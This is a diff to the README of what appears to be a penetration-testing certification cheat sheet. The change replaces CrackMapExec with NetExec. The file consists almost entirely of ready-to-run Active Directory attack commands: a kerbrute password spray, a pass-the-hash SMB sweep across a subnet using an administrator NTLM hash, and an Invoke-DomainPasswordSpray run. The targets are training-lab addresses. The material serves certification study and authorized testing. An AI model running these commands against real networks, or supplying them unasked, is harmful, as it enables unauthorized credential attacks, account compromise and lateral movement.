njahrckstr/CPTS-cheatsheet/README.md

 # Uses kerbrute and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host.
 kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

-# Uses CrackMapExec and the --local-auth flag to ensure only one login attempt is performed from a Linux-based host.
+# Uses NetExec and the --local-auth flag to ensure only one login attempt is performed from a Linux-based host.
 This is to ensure accounts are not locked out by enforced password policies.
 It also filters out logon failures using grep.
-sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
+sudo netexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

 # Performs a password spraying attack and outputs (-OutFile) the results to a specified file (spray_success) from a Windows-based host.
 Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue